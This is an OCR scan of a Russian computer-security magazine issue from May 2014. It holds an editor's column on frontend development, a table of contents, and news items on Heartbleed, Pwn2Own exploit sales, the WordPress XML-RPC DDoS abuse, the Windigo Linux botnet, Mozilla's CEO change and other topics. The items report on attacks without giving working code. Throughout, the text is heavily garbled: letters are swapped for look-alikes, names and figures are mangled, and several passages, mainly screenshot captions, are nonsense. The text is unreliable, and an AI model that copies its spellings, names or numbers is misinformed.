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Современныи фронтенд 

Все, что может бытв написано на ЈауаЗспр*, рано или поздно 
будет написано. Все, что может бытв нарисовано на СЗЗ, 
будет нарисовано. Признанные гуру в мире веб-технологии 
покажут тебе в деле стек, которыи уже сегодн^ мен^ет ли1до 
интернета 
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поболыие, 
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Расследуем взлом 
по гор^чим следам 
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I помнкз, как начинал делатв первые саиты на заре 2000-х. В то вре- 
М9\ , есл и ты знал тег <1аЫе> с атрибутом уаИдп , твоа верстка рулила 
I и бибикала. Даже сама професси^ версталыдика (о ТгопТепс1-ин- 
женерах речи тогда и не шло) воспринималасв неким приложением к про- 
граммистам и дизаинерам, и верстали в основном первые. Сеичас все 
по-другому. 

Работа над фронтендом болыие не сводитс^ к верстке и бесконечнои 
борвбе с глкжами браузеров — теперв әто отделвныи жанр в веб-про- 
граммировании. В наш век 5РА (зјдп1е раде аррИсаИопз) Тгоп1епс1-инжене- 
ры каждыи денв решакзт множество задач, свазанных с архитектурои, ло- 
гикои и производителвностыо веб-приложении. Әто насто^шии болвшои 
кодинг, по своеи навороченности ничем не уступак)ш,ии бәкенду. Тот, кто 
считает иначе, просто осталс^ в прошлом десатилетии. 

Особенноств современнои клиентскои разработки в том, 
что ТгопТепсЈ-инженер может сделатв готовое веб-приложение, почти 
не прибега^ к помоши оаскепсЈ-разработчика. Причин әтому две. Во-пер- 



вых, мошное развитие архитектурных Ј5-фреимворков перенесло в бра- 
узер паттерны «болыиого» программировани^. Во-вторых, поавление 
ЫосЈе.јз стерло разнииу между браузером и бәкендом (читаи: Ме1еогЈ5). 
В резулвтате обычныи Тгоп1:епс1-разработчик знаком как с версткои и кли- 
ентскои Јауа5спр1:-разработкои, так и с приниипами хранениа данных 
в БД, роутингом, РЕ5Т-АР1 и вполне в состоании за пару днеи сделатв 
свои маленвкии, но гордыи Твиттер. Хота бы у себ^ в браузере. 

Если ты кодил толвко дла десктопа или серверного бәкенда, уверен, 
что после прочтени^ темы номера ты удивишвс^, насколвко фронтенд 
ушел вперед за последние 5-10 лет. Ведв не секрет, что фронтенд-разра- 
ботка сеичас на подвеме. А суд^ по черновикам веб-стандартов, далвше 
все будет еш,е лучше :). 



Илһл Русанен, 

выпускакзи^ии рөдактор ][ 
@11уаВизапеп 



МАИ2014 

№184 



СОМТЕЫТ 



МЕСАИЕШ 

Все новое за последнии месли, 

КОЛОНКАСТЕПЫ ИЛҺИНА 

Комфортныи шелл - әто как? 

РКООҒ-ОҒ-СОЫСЕРТ 

Учимсл смотретһ на мир... ушами 



О^ЕШТОҒРОЫТЕЫО 

Каквсе поменллосһзапоследние 15лет 



АРХИТЕКТУРАЗ.О 

Клиентскии Јаүа5спр{ тогда и теперһ 

ВЕДИНОМСТИЛЕ ^^^Ш^^^^Н 
Разбираемсл в отличилх препроиессоров С55 

СОБРАТҺ ЗА60СЕКУНД 

Разбираемсл с популлрными системами сборки фронтенда 

НАПТИЧВИХПРАВАХ 

Зачем нужен менеджер пакетов, или почему именно Вомег 



КОПАЕМСЛ В Л1ДИКЕ 

Учимсл делатһ приложение длл телевизора 



МАСТЕР БОЛ НА КЛАВИАТУРАХ 

Интервыо с Петром Митричевым, богом спортивного программированил 

Подборка полезностеи длл веб-разработчиков 

Дкожина аргументов из области безопасности 

Утилиты из команднои строки, которые полезны даже в МтсЈомз 8 
ЗАГАДКА«иИКАДЫ» 

Самал интереснал и массовал криптоигра в сети 
ЗАГРУЖА9 РОБОТОВ 

Познавателһно-практическии зкскурс в архитектуру Апсјгојс! 



ПРОФИЛҺНАЛ ЗАДАЧА 

Исполһзуем Тазкег на полнуко катушку 

Хакерские секреты простых вешеи 

0Б30РӘКСПЛ0ИТ0В 
Анализ свеженһкихулзвимостеи 

ЛОГОВ ПОБОЛ ҺШЕ, ПАМИТИ НЕ ЖАЛЕТЫ 
Расследование ини,идента ИБ по горлчим следам 

ЗА ВЫСОКИМ ЗАБОРОМ ОЗЗЕС 
Швеии,арскии нож длл обнаруженил взломов 

ПАТЧ-МЕНЕДЖМЕНТ В СЕГЈТОЗ 

Решаем проблему отсутствил информаи,ии о зесипгу-апдеитах 



НЕБЕЗОПАСНАЛ БЕЗОПАСНОСТВ 
Слабые места современных средств заш,иты 

ЗАГАДКИ МЕ001ЈЕЗТ 
Разбор задании с онлаин-тура 



Х-Т001-5 

7 утилит длл взлома и анализа безопасности 



МАИНИНГ ПО-ВРЕДОНОСНОМУ 

Вскрываем малварһдлл несанки,ионированнои добычи криптовалкоты 

Х-БИОГРАФИ9 ШШ^^^^^^^В 
Топ-10 одиозных вирмеикеров 

Теорил и практика порабошенил 



Обһединлем ТеззегасЈ: и ҒАИМ в борһбе против публичного теста Тыоринга 




Подборка интересныхзадач, которыедакотнасобеседованилх 

ВИРТУАЛИЗАиИК) В МАССЫ! 

Тест СогеОЗ 

КАКОИ У ВАС ПЛАН, МИСТЕР ФИКС? 

Сравниваем планировшики ввода/вывода лдра Ыпих 

ПРЕДВОДИТЕЛҺ АПАЧЕИ 

Знакомимсл с безопасным и легким веб-сервером НЈашШа 

СКОРОСТҺ РЕШАЕТ ВСЕ! 

Тестирование производителһности N0501 БД 

ҒАО ^^^^^^^^Ш 
Вопросы и ответы 

Где искатһ контент длл номера? 



Удобные веб-сервисы 




ЫЕ\Л/3 



С' 



Марил «МЈТгШ» Нефедова 
•'уУј * тЈТп1@геа1.хакер.т 



НЕАПТВ1.ЕЕО СЕРҺЕЗНА^ 
У^ЗВИМОСТҺ В ОРЕЫЗЗЕ 




7апрел^ сотрудники Тһе Ореп551_ Ргојес!: выпустили 
бкзллетенв безопасности с сообидением о критиче- 
скои у^звимости С\/Е-2014-0160 в популлрнои крипто- 
графическои библиотеке Ореп551_ (1 .0.1 и 1.0.2-оеШ). 
У^звимоств св^зана с отсутствием необходимои 
проверки грании, в однои из прои,едур расширени^ Неагјоеај 
дл^ протокола Т1_5/0Т1_5. Из-за маленвкои ошибки кто угодно 
может получитв доступ к оперативнои пам^ти компвкзтеров, чви 



коммуникаи,ии «заидиидены» улзвимои версиеи (ЈрепбЫ.. в том 
числе злоумышленник получает доступ к секретным кгшчам, 
именам и парол^м полвзователеи и всему контенту, которыи дол- 
жен передаватвс^ в зашифрованном виде. При зтом не остаетс^ 
никаких следов проникновени^ в систему. 

Хот^ за один такт злоумышленник может прочитатв толвко 64 
Кб пам^ти, количество тактов не ограничено, если обновл^тв со- 
единение. Расширение НеагШеа! предназначено дл^ «проверки 
сердиебиени^» на другои стороне соединени^, то еств дл^ бо- 
лее зффективного управлени^ сесси^ми. Такие запросы к серве- 
ру выгл^д^т вполне нормалвными. Некто, знавшии об у^звимо- 
сти, имел возможноств прослушиватв «зашифрованныи» трафик 
почти во всем интернете с марта 2012 года, когда вышла верси^ 
Ореп551_ 1.0.1. 

Более того, получив секретные кгшчи сервера, злоумышлен- 
ник имеет возможноств расшифроватв и старыи зашифрован- 
ныи трафик, если он был предусмотрителвно записан перед зтим 
и сохранен на будуидее. 

У^звима^ верси^ Ореп551_ исполвзуетсл в популлрных 
веб-серверах пдјпх и Арасһе, на почтовых серверах, 1М-серве- 
рах, \/РЫ, а также во множестве других программ. Уидерб от бага 
огромен. 

Известныи криптограф Бркзс Шнаиер в своем недавнем выступлении высказал мне- 
ние, что в разведке несколвких дес^тков стран еств подразделени^, которые ишут баги 
в проектах Ореп 5оигсе, а информаиј/т о НеаМЫеес! два года назад стала доступнои 
дл^ разведывателвных служб как минимум двадидти государств. По шкале от 0 до 10 
он оиенил опасноств зтои улзвимости в 11 баллов. 

По информаиии В1оотоегд, АНБ узнало об у^звимости буквалвно через несколв- 
ко днеи после того, как соответствукзидии программныи код был вклкзчен в состав сво- 
боднои библиотеки Ореп551_, котора^ исполвзуетс^ на подавл^кзидем болыиинстве 
веб-саитов дл^ шифровани^ трафика по протоколу Т1_5 (НТТР5). 

У^звимоств обнаружили спеииалисты по информаи,ионнои безопасности из компа- 
нии Сос1епопгпсоп, а также, независимо от них, Нил Мехта (Ыее1 Мегтг_а) из подразде- 
лени^ Өоод1е 5есип1:у. Реб^та из компании Сос!епотЈсоп подготовили подробное опи- 
сание бага и даже открыли дл^ него отделыныи саит Неаг1:Ыеес1.сот с изображением 
кровоточаидего сердиа. 



АЫОРОО ДЛЛ ВСЕГО 

6оод1е работаөт над версилми Апсјгснс! длд носимои әлектроники 
и умных телевизоров 



Баг присутствует во всех 
верси^х веток 0реп381_ 
1.0.1 и 1.0. 2-ое1а, 
вклкоча^ 1 .0.1Т и 1.0.2- 
ое1а1. Исправленна^ 
верси^- 1.0. 1д, которуко 
всем пострадавшим 
необходимо установитв 
немедленно, после чего 
сгенерироватвновые 
клкочи и сертификаты 
и предприн^твпрочие 
меры безопасности. 
Полвзователеи следует 
предупредитв о возмож- 
ноиутечкеихпаролеи. 
В случае невозможности 
немедленного апдеита 
наисправленнуковер- 
сико следует переком- 
пилироватвОреп331_ 
сфлагом-0ОРЕМ551__ 
1Ч0ЈНЕАРТВЕАТЗ. 



Вәтом году на рынок обрушиласв насто^ида^ волна так называемои носимои 
әлектроники — всевозможные браслеты-трекеры, умные часы и другие по- 
хожие гаджеты стали главнои темои прошедшеи недавно СЕ5, и зто толвко 
начало. Разумеетс^, все производители железа и софта сеичас старакзтс^ не упу- 
ститв тенден1дикз. В әтом свете анонс от компании Өоод1е совсем не удивителен — 
софтверныи гигант сообидил о том, что работает над системои АпсЈгоЈа 1 \Л/еаг, спеи,иа- 
лизированнои модификаи,иеи своеи ОС дгт носимыхустроиств. 

Пока подробностеи оченв мало. Известно, чтоУЧеаг изначалвно будет адаптиро- 
вана дгт умных часов, а поддержка других устроиств по^витс^ со временем. \Л/еаг 
будет поддерживатв голосовое управление, здесв, как и в случае с Өоод1е Ө1азз, по- 
надобитс^ команда «ОК, Өоод1е», чтобы начатв взаимодеиствоватв с устроиством. 
Также Өоод1е, конечно, обеидает обилие приложении на лкзбои вкус, от сои,иалв- 
ных сетеи и мессенджеров до фитнес-функи,ии. Пока АпсЈгоЈс! У\1еаг доступна толвко 
дгт разработчиков, но первые устроиства на неи по^в^тс^ до кони,а года. 

Еше один АпсЈгоЈсЈ-проект и еше один анонс Өоод1е: в компании полным ходом 
идет подготовка к запуску собственного ТВ-проекта под названием Апс!гоЈс! ТУ — 
удобного интерфеиса дл^ поиска и просмотра видео при помоиди разных сервисов 
и различных подписок. Разработчики уже труд^тс^ над созданием упроиденных вер- 
сии своих Апс!гоЈс1-приложении дгт ТВ-контента. 




Первои новинкои 

с АпсЈгоЈо" Меаг на борту 

станутчасы 16 6 Ш1сһ. 

Также ведутс^ пере- 

говорыскомпани^ми 

Мо1ого1а, Затзипд, НТС 

иАЗУЗ. 




«Сеичас всө происходит быстро. 
Через двадиатв лет спрос 
на представителеи многих 

ПППГһРПРММ ооглртип ПИМОМТРа ИП КУ1ИР 



I I Ч_|_У 4^4^4^1/11/1 V ^ V I V I V ✓ I I I Ч^ 11/10 1/114-//!, I 14^ I V I I 1^ 

кажетс^, что далөко нө всө әто 
пониманот». 

0 НЕОБХОДИМОСТИ РЕФОРМЫ ОБРАЗОВАНИЛ, КОТОРОЕ 

НЕ ПОСПЕВАЕТ ЗА ПРОГРЕССОМ 

Билл Геитс 



РМ№ОШ 

Уирөп традииионно показали класс 

Конкурс Р\л/п20\л/п ежегодно прохо- 
дит в Ванкувере, в рамках конфе- 
рени,ии Сап5ес\Л/ез{. На әтот раз 
конкурсу удалосв побитв сразу несколв- 
ко рекордов: в әтом году в Р\л/п20\л/п 
прин^ло участие небывалое количество 
участников. Обида^ сумма, выплачен- 
на^ конкурсантам, тоже стала беспреи,е- 
дентнои — 850 тыс^ч долларов. Хот^ әта 
и,ифра не вклкзчает в себ^ стоимоств до- 
полнителвных бонусов, в том числе ноут- 
буков дл^ каждого победител^ и бонус- 
ных очков 201. 

Уже по доброи традии,ии самыми заметными участниками соревновани^ вновв 
стала команда франи,узскои компании \/иреп, что занимаетс^ торговлеи әксплоита- 
ми в странах НАТО. \/иреп известны тем, что весвма избирателвно подход^т к выбору 
клиентов и, скажем, не продакзт әксплоиты государствам с диктаторским режимом. 

В первыи же денв конкурса за четыре предоставленных әксплоита \/иреп получила 
призовых на сумму 300 тыс^ч долларов. На зтот раз \/иреп показала Оо!ау-әксплои- 
ты дл^ МогШа ҒЈгеТох, Ао!оое Ғ1азһ, МЈсгозоП 1п1егпе1: Ехр1огег и Ао!оое Реао!ег. Более 
того, также был продемонстрирован әксплоит дл^ Огас1е Јауа, однако позже \/иреп 
отказаласв предоставитв исходныи код (очевидно, оставили его дл^ одного из своих 
клиентов). Второи конкурсныи денв принес компании еиде 100 тыс^ч благодар^ әкс- 
плоитудл^ Сһготе, с исполызованием и,епочки у^звимостеи в движках ВНпк и \Л/еһКЈ1:, 
а также песочнии,ы Сһготе. 



СЛИШКОМХОРОШИИ 

V-/ 



« — 

ИТОГИ 




ДИЗАИН — 310 I 1Ј10Х0 



Интөрөснал төорил о том, почөму 
новыи Феисбуктакои нөудобныи 



Недавно Ғасеооок пережил очереднои редизаин, и нелв- 
сказатв, что стало лучше. Скорее наоборот — стало 
хуже. Огттв. РазработчикЗуотЈе Дастин Кертис задалс^ 
вопросом, почему же Ғасеооок отказалс^ от более удачного 
дизаина в полызу ^вно худшего, и опубликовал у себ^ в блоге 
отличнукз статыо. 

Сутв изыскании Кертиса вот в чем. Год назад Ғасеооок те- 
стировали отличныи новыи дизаин, где ставка делаласвна кон- 
тент, — фотографии там стали болвше, иконки увеличивалисв, 
улучшиласв интеграии^ с мессенджером и так далее. Әто но- 
вовведение тестировалосв не на всех полызовател^х, как часто 
бывает, но определенно выггтдело прекрасно. Однако недав- 
нии редизаин Ғасеооок оказалс^ куда менее удачен, нежели 
та тестова^ верси^. Как пишет Кертис, от знакомых он узнал 
о том, что дизаин годичнои давности оказалс^ слишком хорош 
и удобен. Тесты показывали, что лкзди стали проводитв в лен- 
те новостеи менвше времени и почти перестали замечатв то, 
что ее окружает, — профили друзеи, странии,ы событии и про- 
чее. Из-за зтого оидутимо упало среднее врем^, проводимое 
полызователем на Ғасеооок. Разумеетс^, подобныи расклад 
никак не мог устроитв руководство компании. Так что дело 
далеко не всегда в инноваи,и^х и оптимизаи,ии, порои балом 
прав^т сухие и,ифры. Возможно, поәтому Феисбук и остаетс^ 
столв неудобным. 




Кстати, знаешвлиты, 
дорогоичитателв, по- 
чему Ғасеооок синии? 
Нет?АТҺеМемҮогкег 
утверждает, что Марк 
1Дукерберг попросту 
не различаетзеленыи 
и красныи и,вета, у него 
частичныи далвтонизм. 
А синии и,вет и его оттен- 
ки глава Ғасеооок видит 
отлично. Отскода и ^ве- 
товое решение дизаина. 



Зеагсһ (ог реср!е, р1асек апс! 1ҺЈпдз 



СҺНвЫпе №1апсу 

Соо<ј МниЈв. до оо 1 1аа& але! а 1о( о! 1аидһ« 




■6 Ыкс • Сатгпсл* 5һлгс 

АигЛсп МпсОппаМ. №111 СеЛһиг! ;гиЈ 8 о1һс: '. 



Ш Меиа Ғее(ј 

Д Миас 
Л1 А11 ГпвпсЈа 
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Ш 37 тиыа! гпелеа 
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12 тиша! Мепвз 

Ји11а Тагд 

7 тиша! (пелсЈз 

Рвмг X. Овпд ' 

107 тиша! Мепаа 
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Јое ВЈппеу 1Јке5 Ғик! ЗигЫ. 





ҮҮаггтг Оакһ? 

и гһагшаггЈвгсЈазһ.сот 

Затө Васе. 1_еа5 Ми<Ј. 
Сотг_с!г_ ш игЫт ҮЛмлог 
□азһ ЗО Магеп 2 алгЈ Рғоуе 
Үо_Де АҮУаггмг! 

Огап.5 Гог Миз1с 1_оуега? 

аи(Ј10.а250о1о!пм1сдгос.и5.оо 

.УоиЫуотЈО/до һасЗИо 
всГшЛ |Г уои чи а1п>_к_ Го. а 

утнгИ? Тзјгп рнкнјпгз 1Г. |[1 

Г_то.еззк.п 

СГа ОЈ^зеа) ГСооҺофВаг 

ҺЛЈоуеосммеоп Ифогы-Е 




Ғ1 ' 

«Л позвонил прөзидөнту Обамө и выразил огромноө 
разочарованиө по поводутого, что правитөлвство 
наносит огромныи урон нашөму обш,өму будуш,өму» 



ОБ АКТИВНОСт! АНБ И ДРУГИХ СПЕ1ДСЛУЖБ В С01ДИАЛЫНЫХ СЕТЛХ 

Марк 1Дукерберг 




162 000 

САИТОВ\Л/ОРОРРЕЗЗ 
УЧАСТВОВАЛИ 
В 0003-АТАКАХ 

Очередна^ дырка в попул^рнеишем движ- 
ке МогсјРгезз привела к очереднои масштаб- 
нои проблеме. У^звимостб нашласв в модуле 




387 000 

символов 
и бөсконөчныи 
рөбут длл Апс1 Г01С1 

-> Туреикии хакер Ибрагим Балич нашел 
прекрасныи баг в Апс1го.с1 (4.2.2, 4,3, 2.3). 
Лкобое приложение с названием длинои 
более 387 тыс^ч символов (поле аррпате 



ХМ1.-ВРС (хш1грс.рһр) , что исполвзуетс^ 
дл^ служебного, сервисного или мобилһного 
доступа к платформе. По данным компании 
Зисип, уже порлдка 162 тыслч саитов исполһ- 
зукотс^ в ООоЗ-атаках благодар^ әтои дырке. 




в 51ппд5.хт1) уводит ОС в иикличнуно пере- 
загрузку. Такое АРК рушит даже песочнииу 
Соод1е Р1ау Воипсег - әмуллтор АпсЈгоЈо", в ко- 
тором автоматически провержотс^ все прило- 
женил перед регистраииеи в Соод1е Р1ау. 
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ТАКОИ СЕО 
НАМНЕНУЖЕН 



МогШа назначила и тут 

жө смөстила с поста нового СЕО 

Неожиданно громкии скандал разразилс^ в св^- 
зи с назначением Брендана Аика на пост СЕО 
компании МогШа. Напомнкз, что Аик не кто инои, 
как «отеи,» ЈауаЗспр!. В Мо__Ша Ғоипс!а.Јоп он работал 
буквалвно с первого дн^ создани^ организаиии, так 

итп о^|^г»п о ггл п> мппппи мто п 1_ы г\гг\ п \л пси/тлпо 1/о _ 
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В 1995 ГОДУАИК 
РАЗРАБОТАЛ ША5СР1РТ 
В НАЧАЛЕ 1998 ГОДА 
УЧАСТВОВАЛ В ОТКРЫТИИ 
М02Ш.ОКС. В 2003 
ГОДУ А01.3АКРЫЛА 
ПОДРАЗДЕЛЕНИЕ ШЗСАРЕ, 
ИАИКПЕРЕШЕЛ ВМ02ША 
ҒОШАШ. С 1998 ГОДА 
РУКОВОДИЛ РАЗРАБОТКОИ 
БРАУЗЕРА М02ША/Ғ1КЕҒОХ 



залс^ вполне логичным. Многие издани^ называли Аика 
отличнои кандидатурои и предполагали, что он может 
статв дгт МогШа насто^идим лидером. Однако все вы- 
шло иначе. Кто-то полагал, что предыдуидии СЕО Гәри 
Ковач продержалс^ на әтом посту оченв недолго — ме- 
нее трех лет? Что ж, Аик проработал и того менвше. 




Дошло до того, что некоторые подконтролвные 
ЛТБТсаиты, втомчислеодин изкрупнеишихсаи- 
товзнакомств, стали блокироватвдоступ полвзо- 
вателеи ҒЈгеТох, предлага^ им сменитв браузер. 



К сожаленикз, оказалосв, что у Брендана Аика еств противники, если не сказатв 
«враги». И все әто никак не св^зано с его профессионалвнои де^телвностыо, әто св^- 
зано с политическими взггтдами. Брендан Аик оказалс^ привержени,ем традии,ион- 
ных взггтдов на семеиные отношени^. В 2008 году он пожертвовал 1000 долларов 
в поддержку Предпожени^ 8, конституиионнои поправки штата Калифорни^, кото- 
ра^ запреидала однополые браки. ЛГБТ-сообидество возненавидело его еиде тогда 
и так возмутилосв назначением Аика на пост СЕО, что в сети развернуласв полно- 
масштабна^ травл^. Кроме того, трое из шести членов совета директоров покинули 
МогШа в ту же неделкз, когда Аика назначили на новукз должноств. Ушли Гәри Ковач, 
Джон Лилли и Әлен Симинофф. Компани^ сообшила, что әти событи^ не св^заны, 
уход әти лкзди запланировали давно и новыи СЕО здесв ни при чем. Также компани^ 
Мо2Ша выпустила офии,иалвное за^вление о том, что считает всех лкздеи равными, 
вне зависимости от пола, возраста, кулвтуры, гендернои идентичности, вероиспове- 
дани^ и сексуалвнои ориентаи,ии. Но не помогло и зто. Возмуидение обидественности 
было так силвно, что у Аика не осталосв иного выхода, кроме как сложитв с себ^ пол- 
номочи^ СЕО. Уход^ с поста, Брендан по^снил, что мисси^ проекта важнее отделв- 
ных лкздеи и он ^вно не может бытв сеичас әффективным лидером. 



МЕСАЫЕ\Л/3 



За первые несколвко днеи кампа- 
нии по сбору средств уже показала 
себл отлично. Поступило заказов 
на $ 141 485, так что нужные 250 ты- 
слч за полтора меслиа, скорее всего, 
наберутсл без особых проблем. 




ПЕРВЫИВМИРЕ 



СВОБОДНЫИЛӘПТОП 

Начат приөм заказов на самыи опөнсорсныи 
ноутбук в мирө 



Ноутбук Ыоуепа — иде^ хакера Әндркз «оипше» Хуанга, 
известного, в частности, по взлому Хоох. Разработка 
началасвеиде в2012 году, когдаХуангвместес коллега- 
ми решили создатв первыи в мире по-насто^идему свободныи 
ноутбук. Иде^ была датв сообидеству открытукз платформу, 
с открытои документаи,иеи и руководством по программи- 
рованикз, чтобы лкзбои желакзидии мог собратв из комплек- 
тукзидих собственныи ноутбук, маршрутизатор и так далее, 
на свои вкус, с лкзбои клавиатурои, корпусом и размером 
әкрана. И при зтом никаких сложностеи и проблем с ЫОА. 
Наити подобное решение оказалосв оченв непросто, в ито- 
ге разработку решили базироватв на проиессоре Ғгеезса1е 
ЈМХ6, так как Ғгеезса1е оказалс^ единственно подход^идим 
вариантом дл^ ЗоС. 

Сеичас, когда разработка завершена, уже можно ска- 
затв, что характеристики устроиства вышли вполне непло- 




хими. 1\1оуепа в әтом смысле напоминает топовые планше- 
ты, что весвма неплохо: четырехБ^дерныи АВМ Согт.ех-А9 
начастоте 1,2 ГПд. Оперативнои пам^ти ООВЗ-1066 50-01ММ 
можно добавитв до 4 Гб, внутреннии развем 5АТА-И подходит 
дл^ хорошего 550-накопител^. Был также разработан адап- 
тер дгт подклкзчени^ гетЈпа-диспле^ 1ЈЗ 1_Р1290Е размером 
12,85», 2560 х 1700 пикселеи (239ррј). ОС дл^ ноутбука также 
можно самосто^телвно скомпилироватв из исходников. 

Теперв, когда практически все готово, проект перешел 
в стадикз сбора средств, что не менее важно: сго\л/с!5ирр1у. 
сот/ко5адЈ/поуепа-ореп-1арт.ор. Кампани^ завершитс^ 
18 ма^, и ее и,елв — набратв заказов на 250 тыс^ч долларов. 
И әто не представл^етс^ такои уж проблемои. 

Ыоуепа можно заказатв в четырех вариантах. Самыи де- 
шевыи — конструктор за 500 долларов дгт тех, кто хочет все 
собратв своими руками. Его присылакзт без корпуса и дис- 
пле^: толвко материнска^ платас4 Гб РАМ, флеш-карта на4 Гб 
с установленнои ОеЫап и \/\/ј-П-адаптер. 

Набор за 1195 долларов, в свокз очередв, поставл^етс^ 
в корпусе с дисплеем, но без клавиатуры и контроллера ак- 
кумул^торнои батареи. Әтот комплект уже подходит дгт на- 
столһного компыотера и исследователвских лаборатории. 

Полноиенныи ноутбук продакзт за 1995 долларов, он уже 
поставл^етс^ с контроллером и 550-накопителем на 240 Гб 
и аккумул^тором. Однако и здесв почему-то нет в комплекте 
клавиатуры. Хот^, конечно, ее легко докупитв отделвно. 

Дл^ тех, кто готов потратитв п^тв тыс^ч долларов, обеида- 
кзт изготовитв шедевр в дерев^нно-алкзминиевом корпусе 
ручнои работы от известного дизаинера Курта Мотваилера. 




Проект Исл/епа 
заметили и на- 
перебои хвал^т 
многие ГГ-изданм. 
Так, Шес1 пишет: 
«Вы можете бытв 
уверены, что зта 
машина надежна 
и безопасна снизу 
доверху, что в по- 
стсноуденовскукз 
зру более чем же- 
ланно дл^ многих». 





КАР10П 




95%АТМ 

в США до сих пор 

работакл- на базе 

ХР, чһ9\ поддержка 
закончиласһ толһко 
что, а апгреид до \Мп 7 
слишком дорог. Про- 
изводители банкома- 
тов всерызз рассма- 
тривакзт возможностһ 
в будуш,ем переити 
на Ыпих, как на бес- 
платнукз и более 



В сентлбре старту- 
к)т офшдиалвные 
продажи Хоох Опе 
в России — МЈСГ050ТТ, 
наконеи, обвавила 
офиииалһнуко дату. 
Конечно, многие, кто 
хотел купитһ новукз 
консолһ, уже ее купи- 
ли, но все же немало 
лкздеи ждут и офии,и- 
алһного релиза. 



67 новых зксплои- 
тов и 51 дополни- 
телвныи модулв — 

вышел Ме1азр1о^ 
4.9. Теперһ обш,ее 
количество модулеи 
достигло 1974 (+118). 
Также немаловаж- 
но, что Ме1азр1оИ4.9 
научилса обходитһ 
антивируснукз зашиту 
в 90% случаев и те- 
перһ имеет функиико 



В ЕС все-таки пол- 
витсл единое стан- 
дартное устрои- 
ство длл зарлдки 
мобилвных, такое 
решение прин^л пар 
ламент Евросокзза. 
Производител^м да- 
дут год, чтобы приве 
сти свокз продук1дик} 
в соответствие с но- 
вым законом. 



(Јес$1Ј1 1сИЈМуНЈ I шсмф(Ј|Ј- 

му, которук) обновитһ 
проиде. 



раемых задач. 




ОНОРВОХПРОТИВ 

НЕЛЕГАЛҺНОГО 

КОНТЕНТА 

Длл многих полвзователеи стало неожиданноствкз, 
что Огорһох филһтрует контент 

Не секрет, что многие фаиловые хранилиш,а вынуждены здорово прогибатвс^ под пра- 
вообладателеи и правоохранителыные органы, чтобы выжитв. Така^ судвба постигла 
ВарЈсЈзһаге, из-за зтого закрыли Меда11р1оао!. Но и облачные хранилишд не отстакзт. 
Так, в прошлом году представители МЈсгозоТС обнаружили, что полызователв ЗкуОгме (те- 
перв ОпеРт/е) хранил у себ^ фото детеи во взрослои одежде и с маки^жем. МЈсгозоТ! не- 
медленно передали данные в полииикз. 

Но почему-то дл^ многих стало скзрпризом, что нелегалыныи контент у своих полызо- 



вателеи иш,ет и игоргЈох. шум поднилси из-за того, что один полвзователв сервиса захо- 
тел поделитвс^ ссылкои на фаил из своеи ОгоргЈОх-папки, но не смог, — фаил оказалс^ за- 
блокирован за нарушение авторских прав. Әтот случаи собрал кучу ретвитов и перепостов, 
так что ОгоргЈОх вынужден был обв^снитвс^. ОгоргЈОх правда провер^етхеш фаилов (толвко 
хеш), свер^^св со списком запрешенных фаилов. Если еств совпадение — поделитвс^ та- 
кои ссылкои будет невозможно. Хот^ фаил никуда не денетс^ из папки в облаке и останетс^ 
доступен самому полызователкз. В обш,ем, компани^ увер^ет, что по-прежнему не загттды- 
вает в папки полызователеи, все делает автоматика. 



«Толһко созданиө 
и подписаниө аналога 
Великои хартии волвностеи, 
соблнздөниө положөнии 
которои гарантировали бы 
правитөлвства, компании 
и обидественные институты, 
поможөт сохранитв интөрнөт 
Д° С ТШ1^' свободным 

И ОТ^Ш№1М дл^ всөх» 
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КампыотЕры под 
упрлвпднием I ЈтпгЈҒпану 
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Сервер сПора 
иилит.еммыл ЈЈпиа/ЕҺшј 1 
дпнпих 
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Легитпынал система 

Снс1 ема ыинлечемы ни 
орсдопглслуК' □ктнопости 

Система гасахека 
ипих/һаигу 

Г.игтема дараж^на 
ипих/СсЈвгкн! 

Сигј| -М5 зарыжемы 
Ыпих О пнпјкј 

Слстема ааражена 
Рег^аИтЈо! 



Изппеч-а похииу;нные 
данныө учатнык запиеаЈ! 



СЧ|ЈЕ1 ЕЈЈ ЛЈЈЫ М1Г1 1И1 фи рМ Ы1|И ПЈ, 

собрвипукз со осск 
ҝомпыотеров с ипих/ЕЫлу 

Испалһзуетсд длл 
устансвш вреданисногс кода 
на серверы 



Опе[мггор 

1_ 



Ј 



БОТНЕТИ3 25ТЫС^Ч 
Ш1Х-СЕРВЕР0В 

Обнаружөна массированнал кибөратака ХЛ/ЈпсИдо, 
от которои пострадала и Россил 




Болвшои и весвма необычныи ботнет обнаружила компани^ Е5ЕТ 
при помоиди СЕВТ-Випс! и других әкспертных групп. Сложнои ата- 
ке подверглисв более 25 тыс^ч серверов по всему миру, работа- 
кзидих под операи,ионными системами Ыпих и 11Ы1Х. 

Конечнои идпыо «операи,ии\Л/Јпс1Јдо», какее назвали в компании Е5ЕТ, 
было заражение компыотеров под\/\/јпс1о\л/5, кликфрод и рассылка спама. 
Но дл^ әтого злоумышленники проделали огромнукз предварителвнукз 
работу. В атаке был задеиствован иелыи комплекс вредоносов, у^зви- 
мост^ми авторы атаки, видимо, не полызовалисв прини,ипиалвно: бәкдор 
Ыпих/Еоигу, шелл Ыпих/СсЈогкео 1 , ОЫ5-сервер Ыпих/Опјггнкј и спам-бот 
Рег1/Са1тгЈОт.. Что интересно, некотора^ малварв из данного списка была 
обнаружена әкспертами в предыдушие годы, но никто не думал, что мас- 
штабы проблемы столв сервезны. В частности, находили бәкдор Еоигу, 
но, так как он устанавливалс^ на серверы вручнукз, предполагали, что әто 
единичные, приидпвные атаки. Разумеетс^, никому не пришло в голо- 
ву, что речв идет о дес^тках тыс^ч заражении. Однако в икзне 2013 года 
было обнаружено 7707 зараженных серверов, в окт^бре — 12 326, в ^н- 
варе 2014-го — еш,е 11 110. Таким образом, зарегистрировано уже 26 024 
уникалыных 1Р-адреса, инфии,ированных Есшгу, в том числе 3794 новых 
за последние три мес^иа. По подсчетам Е5ЕТ, схема деиствовала с 2011 
года, но почти три года оставаласв вне «видимости радаров». В числе по- 
страдавших от атаки сРапе! и Ыпих Ғоипс!атЈоп. 

После получени^ контрол^ над сервером его исполызовали дгш зара- 
жени^ размешенных на нем саитов, а также дл^ похишени^ клиентских 
данных. Кроме того, малварв пыталасв заражатв полызователеи сервера, 
причем на полызователеи \Л/Јпс1о\л/5 и Мас реагировала по-разному. Фак- 
тически болвшеи опасности подвергалисв именно\/\/Јпс1о\л/5-полызовате- 
ли, «^блочникам» просто подбрасывали переадресаи,ии на безвредные 
саиты знакомств или странии,ы с порнографическим контентом. Поми- 
мо әтого, у вредоноса имелс^ и модулв обновлени^, которыи и позвол^л 
операторам ботнета полностыо проапгреидитв ПО и оставатвс^ необна- 
руженными. 



35 миллионов 
спам-сообшении 
